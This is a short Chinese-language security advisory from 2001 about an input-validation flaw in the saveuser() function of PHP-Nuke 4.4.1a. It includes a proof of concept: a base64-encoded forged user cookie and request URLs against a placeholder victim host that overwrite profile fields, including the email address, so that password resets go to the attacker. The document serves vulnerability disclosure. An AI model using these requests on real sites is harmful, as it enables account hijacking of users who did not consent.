PHP-Nuke 没有处理好非法SQL查询过滤发布时间:2001-04-27 更新时间:2001-04-27 严重程度:中 威胁程度:其它 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 PHP-Nuke version 4.4.1a详细描述 PHP-Nuke (http://www.phpnuke.org/)是一个自动新闻发布系统, 其中在saveuser()函数没有很好的处理传递给查询的MYSQL。 可能让攻击者改变用户EMAIL地址和通过EMAIL地址来询问密码, 当然这并不容易实验,因为我们不知道用户的UID,不过可以 通过下面的信息来检查: 测试代码 $ /bin/echo -e "0:<user>:2:3:4:5:6:7:8:eee" | uuencode -m f begin-base64 644 fMDpBbm9ueW1vdXM6MjozOjQ6NTo2Ojc6ODplZWUK [***] lynx http://victim/user.php?op=saveuser&user=[***]&uid=X&uname=<user> 其中可以远程修改的变量有如下: name='', email='', femail='', url='', bio='' , user_avatar='', user_icq='', user_occ='', user_from='', user_intrest='', user_sig='', user_aim='', user_yim='', user_msnm='' 换句话说,我们要改变EMAIL地址,我们可以如下操作: http://victim/user.php&op=saveuser&user=[***]&uid=X&uname=<user>&email=<email you want> 解决方案 尚无 相关信息 venomous(venomous at RDCREW.COM.AR) |
